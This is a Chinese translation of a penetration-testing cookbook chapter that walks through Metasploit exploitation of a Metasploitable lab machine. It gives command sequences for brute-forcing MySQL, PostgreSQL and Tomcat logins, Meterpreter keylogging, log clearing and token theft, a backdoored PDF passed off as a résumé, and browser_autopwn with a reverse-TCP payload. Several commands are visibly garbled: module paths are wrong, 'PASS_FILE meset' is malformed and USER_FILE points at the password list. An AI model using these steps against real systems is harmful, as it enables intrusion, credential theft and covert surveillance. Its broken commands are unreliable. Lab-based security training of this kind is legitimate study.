第六章 漏洞利用

作者：Willie L. Pritchett, David De Smet

譯者：飛龍

協(xié)議：CC BY-NC-SA 4.0

簡介

一旦我們完成了漏洞掃描步驟，我們就了解了必要的知識來嘗試?yán)媚繕?biāo)系統(tǒng)上的漏洞。這一章中，我們會使用不同的工具來操作，包括系統(tǒng)測試的瑞士軍刀 Metasploit。

6.1 安裝和配置 Metasploitable

這個(gè)秘籍中，我們會安裝、配置和啟動 Metasploitable 2。 Metasploitable 是基于 Linux 的操作系統(tǒng)，擁有多種可被 Metasploit 攻擊的漏洞。它由 Rapid7 （Metasploit 框架的所有者）設(shè)計(jì)。Metasploitable 是個(gè)熟悉 Meterpreter 用法的極好方式。

準(zhǔn)備

為了執(zhí)行這個(gè)秘籍，我們需要下列東西：

• 互聯(lián)網(wǎng)連接

• VirtualBox PC 上的可用空間

• 解壓縮工具（這里我們使用 Windows 上的 7-Zip）

操作步驟

讓我們開始下載 Metasploitable 2。最安全的選擇是從 SourceForge 獲取下載包：

1. 從這個(gè)鏈接下載 Metasploitable 2：<http://sourceforge.net/ projects/metasploitable/files/Metasploitable2/>。

2. 將文件包括到硬盤的某個(gè)位置。

3. 解壓文件。

4. 將文件夾內(nèi)容放到你儲存虛擬磁盤文件的位置。

5. 打開 VirtualBox 并點(diǎn)擊New按鈕：

6. 點(diǎn)擊Next。

7. 輸入 Metasploitable 2 的名稱并將Operating System:選擇為Linux，Version:選項(xiàng)Ubuntu。像下面的截圖那樣點(diǎn)擊Next。

8. 如果可用的話，選擇 512 MB，并點(diǎn)擊Next。

9. 選項(xiàng)現(xiàn)有磁盤，并從你下載和保存 Metasploitable 2 文件夾的地方選擇 VDMK 文件。

10. 你的虛擬磁盤窗口會像下面的截圖那樣。在這個(gè)示例中，我們完全不需要更新磁盤空間。這是因?yàn)槭褂?Metasploitable 的時(shí)候，你會攻擊這個(gè)系統(tǒng)，而并不是將它用作操作系統(tǒng)。

11. 點(diǎn)擊Create。

12. 通過點(diǎn)擊 Metasploitable 2 的名稱和Start按鈕來啟動它。

工作原理

這個(gè)秘籍中，我們在 Virtualbox 中配置了 Metasploitable 2。我們以從Sourceforge.net下載 Metasploitable 開始這個(gè)秘籍，之后我們配置了 VDMK 來在 VirtualBox 中運(yùn)行并以啟動該系統(tǒng)結(jié)束。

6.2 掌握 Armitage，Metasploit 的圖形管理工具

新版本的 Metasploit 使用叫做 Armitage 的圖形化前端工具。理解 Armitage 非常重要，因?yàn)樗ㄟ^提供可視化的信息，使你對 Metasploit 的使用變得簡單。它封裝了 Metasploit 控制臺，并且通過使用它的列表功能，你可以一次看到比 Metasploit 控制臺或 Meterpreter 會話更多的內(nèi)容。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們開始操作 Armitage：

1. 從桌面上訪問Start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage。

2. 在 Armitage的登錄界面中，點(diǎn)擊Connect（連接）按鈕。

3. Armitage 可能需要一些時(shí)間來連接 Metasploit。當(dāng)它完成時(shí)，你可能看見下面的提示窗口。不要驚慌，一旦 Armitage 能夠連接時(shí)，它會消失的。在Start Metaspoit?界面，點(diǎn)擊Yes：

4. 隨后你會看到 Armitage 的主窗口。我們現(xiàn)在討論主窗口的三個(gè)區(qū)域（標(biāo)記為A、B和C，在下面的截圖中）。

   • A：這個(gè)區(qū)域展示了預(yù)先配置的模塊。你可以通過模塊列表下面的搜索框來搜索。

   • B：這個(gè)區(qū)域展示了你的活動目標(biāo)，我們能夠利用它的漏洞。

   • C：這個(gè)區(qū)域展示了多個(gè) Metasploit 標(biāo)簽頁。它允許多個(gè) Meterpreter 或控制臺會話同時(shí)運(yùn)行和展示。

   啟動 Armitage 的一個(gè)自動化方式就是在終端窗口中鍵入下列命令。

   armitage
   

另見

為了了解更多 Meterpreter 的信息，請見“掌握 Meterpreter”一節(jié)。

6.3 掌握 Metasploit 控制臺（MSFCONSOLE）

這個(gè)秘籍中，我們會研究 Metasploit 控制臺（MSFCONSOLE）。MSFCONSOLE主要用于管理 Metasploit 數(shù)據(jù)庫，管理會話以及配置和啟動 Metasploit 模塊。本質(zhì)上，出于利用漏洞的目的，MSFCONSOLE 能夠讓你連接到主機(jī)，便于你利用它的漏洞。

你可以使用以下命令來和控制臺交互：

• help：這個(gè)命令允許你查看你嘗試運(yùn)行的命令行的幫助文檔。

• use module：這個(gè)命令允許你開始配置所選擇的模塊。

• set optionname module：這個(gè)命令允許你為指定的模塊配置不同的選項(xiàng)。

• exploit：這個(gè)命令啟動漏洞利用模塊。

• run：這個(gè)命令啟動非漏洞利用模塊。

• search module：這個(gè)命令允許你搜索獨(dú)立模塊。

• exit：這個(gè)命令允許你退出 MSFCONSOLE。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們開始探索 MSFCONSOLE：

1. 打開命令行。

2. 通過下列命令啟動 MSFCONSOLE：

   msfconsole
   

3. 通過search命令搜索所有可用的 Linux 模塊。每次我們打算執(zhí)行操作時(shí)，都搜索一遍模塊通常是個(gè)好主意。主要因?yàn)樵?Metasploit 的不同版本之間，模塊路徑可能發(fā)生改變。

   search linux
   

4. 使用 John the Ripper Linux 密碼破解模塊。

   use auxiliary/analyzse/jtr_linux
   

5. 通過下列命令展示該模塊的可用選項(xiàng)。

   show options
   

6. 既然我們列出了可以對這個(gè)模塊使用的選項(xiàng)，我們可以使用set命令來設(shè)置獨(dú)立選項(xiàng)。讓我們設(shè)置JOHN_PATH選項(xiàng)：

   set JOHN_PATH /usr/share/metasploit-framework/data/john/wordlists/ password.lst
   

7. 現(xiàn)在執(zhí)行漏洞利用，我們需要輸入exploit命令：

   exploit
   

更多

一旦你通過 MSFCONSOLE 獲得了主機(jī)的訪問，你需要使用 Meterpreter 來分發(fā)載荷。MSFCONSOLE 可以管理你的回話，而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。

6.4 掌握 Metasploit CLI（MSFCLI）

這個(gè)秘籍中，我們會探索 Metasploit CLI（MSFCLI）。Metasploit 需要接口來執(zhí)行它的任務(wù)。MSFCLI 就是這樣的接口。它是一個(gè)極好的接口，用于學(xué)習(xí) Metasploit ，或測試/編寫新的漏洞利用。它也可用于腳本的情況中，并且對任務(wù)使用基本的自動化。

使用 MSFCLI 的一個(gè)主要問題是，你只能夠一次打開一個(gè) shell。你也會注意到，當(dāng)我們探索一些命令的時(shí)候，它比 MSFCONSOLE 慢并且復(fù)雜。最后，你需要知道你打算利用的具體漏洞來使用 MSFCLI。這會使它對于滲透測試新手有些難以使用，他們并不熟悉 Metasploit 漏洞利用列表。

MSFCLI 的一些命令是：

• msfcli：這會加載 MSFCLI 可訪問的所有可用漏洞利用列表。

• msfcli -h：顯示 MSFCLI 的幫助文檔。

• msfcli [PATH TO EXPLOIT] [options = value]：這是執(zhí)行漏洞利用的語法。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們開始探索 MSFCLI：

1. 使用下列命令啟動 Metasploit CLI （MSFCLI）。請耐心等待，因?yàn)檫@可能花一些時(shí)間，取決于你的系統(tǒng)速度。同時(shí)注意當(dāng) MSFCLI 加載完成時(shí)，會顯示可用的漏洞利用列表。

   msfcli
   

2. 顯示 MSFCLI 幫助文檔：

   msfcli -h
   

3. 出于我們的演示目的，我們會執(zhí)行圣誕樹掃描（ Christmas Tree Scan）。我們會選擇選項(xiàng) A 來顯示模塊高級選項(xiàng)。

   msfcli auxiliary/scanner/portscan/xmas A
   

   更多圣誕樹掃描的信息，請見下面的 URL：http://en.wikipedia.org/wiki/Christmas_tree_packet。

4. 此外，你可以列出當(dāng)前模塊的概覽，通過使用S模式。概覽模式是一個(gè)極好方式，來查看可用于當(dāng)前嘗試執(zhí)行的漏洞利用的所有選項(xiàng)。許多選項(xiàng)都是可選的，但是一小部分通常是必須的，它們允許你設(shè)置嘗試?yán)媚膫€(gè)目標(biāo)或端口的漏洞。

   msfcli auxiliary/scanner/portscan/xmas S
   

5. 為了展示可用于此次漏洞利用的選項(xiàng)列表，我們使用O模式。選項(xiàng)使用中配置漏洞利用模塊的方式。每個(gè)利用模塊都用不同的選項(xiàng)集合（或者什么都沒有）。任何所需的選項(xiàng)必須在漏洞利用執(zhí)行之前設(shè)置。在下面的截圖中，你會注意到許多所需選項(xiàng)都設(shè)為默認(rèn)。如果你碰到了這種情況，你就不需要更新選項(xiàng)的值，除非你打算修改它。

   msfcli auxiliary/scanner/portscan/xmas O
   

6. 我們使用E模式來執(zhí)行漏洞利用。

   msfcli auxiliary/scanner/portscan/xmas E
   

   這里，我們使用了默認(rèn)選項(xiàng)。

工作原理

這個(gè)秘籍中，我們以啟動 MSFCLI 開始，之后搜索可用的模塊，并執(zhí)行該模塊。在搜索的過程中，我們選修了圣誕樹掃描模塊并復(fù)查了 MSFCLI 界面來查看模塊概覽和所有可用選項(xiàng)。在設(shè)置完所有選項(xiàng)之后，我們執(zhí)行了漏洞利用。

了解 Metasploit 框架分為三個(gè)不同的部分非常重要。這些部分是：

• 漏洞：這些都是弱點(diǎn)，要么已知要么位置。它們包含在特定的應(yīng)用、阮家寶或協(xié)議中。在 Metasploit 中，漏洞按照分組，和漏洞利用列出，漏洞利用可以攻擊列在它們下面的漏洞。

• 漏洞利用：漏洞利用是用來利用所發(fā)現(xiàn)漏洞的模塊。

• 載荷：一旦成功執(zhí)行了漏洞利用，必須把載荷傳給被攻擊的機(jī)器，以便允許我們創(chuàng)建 shell，運(yùn)行各種命令，添加用戶以及其它。

一旦你通過 MSFCONSOLE 獲得了主機(jī)的訪問，你需要使用 Meterpreter 來分發(fā)載荷。MSFCONSOLE 可以管理你的會話，而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。

6.5 掌握 Meterpreter

一旦你使用 Armitage，MSFCLI 或 MSFCONSOLE 獲得了主機(jī)的訪問權(quán)，你必須使用 Meterpreter 來傳遞你的載荷。MSFCONSOLE 可以管理你的會話，而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。

一些用于 Meterpreter 的常用命令包括：

• help：這個(gè)命令允許你瀏覽幫助文檔。

• background：這個(gè)命令允許你在后臺運(yùn)行 Meterpreter 會話。這個(gè)命令也能為你帶回 MSF 提示符。

• download：這個(gè)命令允許你從受害者機(jī)器中下載文件。

• upload：這個(gè)命令允許你向受害者機(jī)器上傳文件。

• execute：這個(gè)命令允許你在受害者機(jī)器上運(yùn)行命令。

• shell：這個(gè)命令允許你在受害者機(jī)器上運(yùn)行 Windows shell 提示符（僅限于 Windows 主機(jī)）。

• session -i：這個(gè)命令允許你在會話之間切換。

準(zhǔn)備

需要滿足下列要求：

• 內(nèi)部網(wǎng)絡(luò)或互聯(lián)網(wǎng)的連接。

• 使用 Armitage，MSFCLI 或 MSFCONSOLE 由 Metasploit 創(chuàng)建好的，目標(biāo)系統(tǒng)的活動會話。

操作步驟

讓我們打開 MSFCONSOLE 來開始：

1. 首先我們以 MSFCONSOLE 中展示的活動會話開始。

2. 開始記錄目標(biāo)系統(tǒng)中用戶的擊鍵順序：

   keyscan_start 
   

3. 轉(zhuǎn)儲目標(biāo)系統(tǒng)中用戶的擊鍵順序。擊鍵順序會顯示在屏幕上：

   keyscan_dump 
   

4. 停止記錄目標(biāo)系統(tǒng)中用戶的擊鍵順序。

   keyscan_stop 
   

5. 刪除目標(biāo)系統(tǒng)中的文件。

   del exploited.docx 
   

6. 清除目標(biāo)系統(tǒng)中的事件日志。

   clearav 
   

7. 展示運(yùn)行進(jìn)程的列表。

   ps
   

8. 殺掉受害者系統(tǒng)的指定進(jìn)程，使用kill [pid]語法。

   kill 6353
   

9. 嘗試偷取目標(biāo)系統(tǒng)上的模擬令牌。

   steal_token 
   

工作原理

我們以通過 Armitage，MSFCLI 或 MSFCONSOLE 預(yù)先建立的 Meterpreter 會話來開始。之后我們在目標(biāo)機(jī)器上運(yùn)行了多種命令。

更多

當(dāng)我們對基于 Linux 主機(jī)使用 Meterpreter 的時(shí)候，我們能夠在它上面運(yùn)行 Linux 命令，就像我們操作這臺機(jī)器那樣。

6.6 Metasploitable MySQL

這個(gè)秘籍中，我們會探索如何使用 Metasploit 來攻擊 MySQL 數(shù)據(jù)庫服務(wù)器，使用 MySQL 掃描器模塊。MySQL 是許多網(wǎng)站平臺的選擇，包括 Drupal 和 Wordpress，許多網(wǎng)站當(dāng)前正在使用 MySQL 數(shù)據(jù)庫服務(wù)器。這會使它們更容易成為 Metasploitable MySQL 攻擊的目標(biāo)。

準(zhǔn)備

需要滿足下列要求：

• 內(nèi)部網(wǎng)絡(luò)的連接。

• 運(yùn)行在滲透環(huán)境中的 Metasploitable 。

• 用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過打開終端窗口來開始 MySQL 攻擊：

1. 打開終端窗口。

2. 啟動 MSFCONSOLE。

   msfconsole 
   

3. 搜索可用的 MySQL 模塊。

   msfconsole mysql
   

4. 使用 MySQL 掃描器模塊。

   use auxiliary/scanner/mysql/mysql_login
   

5. 顯示模塊的可用選項(xiàng)。

   show options
   

6. 將 RHOST 設(shè)置為 Metasploitable 2 主機(jī)或目標(biāo)主機(jī)的地址。

   set RHOST 192.168.10.111 
   

7. 設(shè)置用戶名文件的位置。你可以選擇：

   set user_file /root/Desktop/usernames.txt
   

8. 設(shè)置密碼文件的位置。你可以選擇：

   set pass_file /root/Desktop/passwords.txt
   

9. 執(zhí)行漏洞利用：

   Exploit
   

10. Metasploit 會嘗試輸入包含在兩個(gè)文件中的所有用戶名和密碼組合。找到生效的登錄和密碼組合旁邊的+符號就可以了。

工作原理

這個(gè)秘籍中，我們使用 Metasploit 的 MSFCONSOLE 來利用 Metasploitable 2 靶機(jī)上的 MySQL 漏洞。我們以啟動控制臺并搜索所有已知的 MySQL 模塊來開始。在選擇 MySQL 登錄利用模塊之后，我們設(shè)置了選項(xiàng)并執(zhí)行了漏洞利用，這讓我們能夠爆破 MySQL 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 MySQL 數(shù)據(jù)庫。

更多

這個(gè)秘籍中，我們使用了自己生成的用戶名和密碼文件。有許多方法可以生成用戶名和密碼單詞列表，這些方法在第八章中涉及。

6.7 Metasploitable PostgreSQL

這個(gè)秘籍中，我們會探索如何使用 Metasploit 來攻擊 PostgreSQL 數(shù)據(jù)庫服務(wù)器，使用 PostgreSQL 掃描器模塊。PostgreSQL 被譽(yù)為全世界最先進(jìn)的開源數(shù)據(jù)庫，許多愛好者聲稱它是企業(yè)級的數(shù)據(jù)庫。我們會使用 Metasploit 來爆破 PostgreSQL 登錄。

準(zhǔn)備

需要滿足下列要求：

• 內(nèi)部網(wǎng)絡(luò)的連接。

• 運(yùn)行在滲透環(huán)境中的 Metasploitable 。

• 用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過打開終端窗口來開始 PostgreSQL 攻擊：

1. 打開終端窗口。

2. 啟動 MSFCONSOLE。

   msfconsole 
   

3. 搜索可用的 PostgreSQL 模塊。

   msfconsole postgresql
   

4. 使用 PostgreSQL 掃描器模塊。

   use auxiliary/scanner/mysql/postgres_login
   

5. 顯示模塊的可用選項(xiàng)。

   show options
   

6. 將 RHOST 設(shè)置為 Metasploitable 2 主機(jī)或目標(biāo)主機(jī)的地址。

   set RHOST 192.168.10.111 
   

7. 設(shè)置用戶名文件的位置。你可以選擇：

   set user_file /root/Desktop/usernames.txt
   

8. 設(shè)置密碼文件的位置。你可以選擇：

   set pass_file /root/Desktop/passwords.txt
   

9. 執(zhí)行漏洞利用：

   Exploit
   

10. Metasploit 會嘗試輸入包含在兩個(gè)文件中的所有用戶名和密碼組合。找到生效的登錄和密碼組合旁邊的+符號就可以了。

工作原理

這個(gè)秘籍中，我們使用 Metasploit 的 MSFCONSOLE 來利用 Metasploitable 2 靶機(jī)上的 PostgreSQL 漏洞。我們以啟動控制臺并搜索所有已知的 PostgreSQL 模塊來開始。在選擇 PostgreSQL 登錄利用模塊之后，我們設(shè)置了選項(xiàng)并執(zhí)行了漏洞利用，這讓我們能夠爆破 PostgreSQL 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 PostgreSQL 數(shù)據(jù)庫。之后找到生效的登錄和密碼組合旁邊的+符號就可以了。

更多

這個(gè)秘籍中，我們使用了默認(rèn)的 PostgreSQL 用戶名和密碼文件。然而我們也可以創(chuàng)建自己的文件。有許多方法可以生成用戶名和密碼單詞列表，這些方法在第八章中涉及。

6.8 Metasploitable Tomcat

這個(gè)秘籍中，我們會探索如何使用 Metasploit 攻擊 Tomcat 服務(wù)器，使用 Tomcat Manager Login 模塊。Tomcat，或 Apache Tomcat，是開源的 Web 服務(wù)器，和 Servlet 容器，用于運(yùn)行 Java Servt 和 JSP。Tomcat 服務(wù)器純粹使用 Java 編寫。我們會使用 Metasploit 來爆破 Tomcat 的登錄。

準(zhǔn)備

需要滿足下列要求：

• 內(nèi)部網(wǎng)絡(luò)的連接。

• 運(yùn)行在滲透環(huán)境中的 Metasploitable 。

• 用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過打開終端窗口來開始這個(gè)秘籍：

1. 打開終端窗口。

2. 啟動 MSFCONSOLE。

   msfconsole 
   

3. 搜索可用的 Tomcat 模塊。

   msfconsole tomcat
   

4. 使用 Tomcat Application Manager Login Utility。

   use auxiliary/scanner/http/tomcat_mgr_login 
   

5. 顯示模塊的可用選項(xiàng)。

   show options
   

   要注意我們有很多設(shè)置為“是”的項(xiàng)目，它們都是必須的。我們使用它們的默認(rèn)值。

6. 設(shè)置Pass_File：

   PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
   

7. 設(shè)置Pass_File：

   USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
   

8. 設(shè)置目標(biāo)的RHOST，這里我們選擇我們的 Metasploitable 2 主機(jī)：

   set RHOSTS 192.168.10.111
   

9. 將RPORT設(shè)置為 8180：

   set RPORT 8180
   

10. 執(zhí)行漏洞利用：

    Exploit
    

工作原理

這個(gè)秘籍中，我們使用 Metasploit 的 MSFCONSOLE 來利用 Metasploitable 2 靶機(jī)上的 Tomcat 漏洞。我們以啟動控制臺并搜索所有已知的 Tomcat 模塊來開始。在選擇 Tomcat 登錄利用模塊之后，我們設(shè)置了選項(xiàng)并執(zhí)行了漏洞利用，這讓我們能夠爆破 Tomcat 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 Tomcat 數(shù)據(jù)庫。之后找到生效的登錄和密碼組合旁邊的+符號就可以了。

6.9 Metasploitable PDF

這個(gè)秘籍中，我們會探索如何使用 Metasploit 來執(zhí)行攻擊，使用 Adobe PDF 內(nèi)嵌模塊來利用 PDF 文檔漏洞。Adobe PDF 是文檔傳輸?shù)臉?biāo)準(zhǔn)。由于它的廣泛使用，尤其是由于它的商業(yè)用途，我們會通過讓用戶認(rèn)為他們打開了來自求職崗位的正常 PDF 文檔來攻擊用戶的機(jī)器。

準(zhǔn)備

需要滿足下列要求：

• 內(nèi)部網(wǎng)絡(luò)的連接。

• 運(yùn)行在滲透環(huán)境中的 Metasploitable 。

• 用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過打開終端窗口來開始這個(gè)秘籍：

1. 打開終端窗口。

2. 啟動 MSFCONSOLE。

   msfconsole 
   

3. 搜索可用的 PDF 模塊。

   msfconsole pdf
   

4. 使用 PDF 內(nèi)嵌模塊：

   use exploit/windows/fileformat/adobe_pdf_embedded_exe 
   

5. 顯示模塊的可用選項(xiàng)。

   show options
   

6. 設(shè)置我們想要生成的 PDF 文件名稱：

   set FILENAME evildocument.pdf
   

7. 設(shè)置 INFILENAME 選項(xiàng)。它是你打算使用的 PDF 文件的位置。這里，我使用桌面上的簡歷。

   set INFILENAME /root/Desktop/willie.pdf
   

   要注意，這個(gè)模塊的所有選項(xiàng)都是可選的，除了INFILENAME。

8. 執(zhí)行漏洞利用：

   Exploit
   

工作原理

這個(gè)秘籍中，我們使用 Metasploit 的 MSFCONSOLE 創(chuàng)建了包含 Meterpreter 后門的 PDF 文件。我們以啟動控制臺并搜索所有可用的 PDF 漏洞來開始。在選擇 PDF 內(nèi)嵌模塊之后，我們設(shè)置選項(xiàng)并執(zhí)行漏洞利用，這讓我們在正常的 PDF 中埋下后門程序。Metasploit 會生成帶有 Windows 反向 TCP 載荷的 PDF。當(dāng)你的目標(biāo)打開 PDF 文件時(shí)，Meterpreter 會開啟答復(fù)并激活會話。

6.10 實(shí)現(xiàn) browser_autopwn

瀏覽器 Autopwn 是 Metasploit 提供的輔助模塊，在受害者訪問網(wǎng)頁時(shí)，讓你能夠自動化對它們的攻擊。瀏覽器 Autopwn 在攻擊之前指定客戶端的指紋識別，也就是說他不會對 IE 7 嘗試?yán)?Firefox 的漏洞?；谒臑g覽器判斷，它決定最適于實(shí)施哪個(gè)漏洞利用。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們通過打開終端窗口來開始這個(gè)秘籍：

1. 打開終端窗口。

2. 啟動 MSFCONSOLE：

   msfconsole 
   

3. 搜索可用的 autopwn 模塊。

   msfconsole autopwn
   

4. 使用browser_autopwn模塊：

   Use auxiliary/server/browser_autopwn
   

5. 設(shè)置我們的載荷，這里我們使用 Windows 反向 TCP：

   set payload windows/meterpreter/reverse_tcp 
   

6. 顯示可用于該載荷類型的選項(xiàng)。

   show options
   

7. 設(shè)置反向連接所使用的 IP。這里，該 PC 的 IP 地址為192.168.10.109。

   set LHOST 192.168.10.109
   

8. 下面，我們打算設(shè)置 URIPATH，這里我們使用"filetypes"（帶引號）：

   set URIPATH "filetypes" 
   

9. 最后，我們執(zhí)行漏洞利用：

   exploit
   

10. Metasploit 會在 IP 地址 <http://[Provided IP Address]:8080> 處執(zhí)行漏洞利用。

11. 當(dāng)訪問者訪問這個(gè)地址時(shí)，browser_autopwn模塊嘗試連接用戶的機(jī)器來建立遠(yuǎn)程會話。如果成功的話，Meterpreter 會確認(rèn)這個(gè)會話。使用會話命令來激活它：

    session –I 1
    

12. 為了顯示我們可以使用的 Meterpreter 命令列表，輸入help。

    help
    

13. 會顯示可用命令的列表。這里，我們啟動擊鍵順序掃描：

    keyscan_start 
    

14. 為了得到受害者機(jī)器上的擊鍵順序，我們鍵入keyscan_start命令：

    keyscan_dump
    

工作原理

這個(gè)秘籍中，我們使用 Metasploit 的 MSFCONSOLE 來執(zhí)行 browser_autopwn 漏洞利用。我們以啟動控制臺并搜索所有已知的autopwn模塊開始。在喧囂autopwn模塊之后，我們將載荷設(shè)置為windows_reverse_tcp。這允許我們在利用成功時(shí)得到返回的鏈接。一旦受害者訪問了我們的網(wǎng)頁，漏洞利用就成功了，我們就能得到 Meterpreter 活動會話。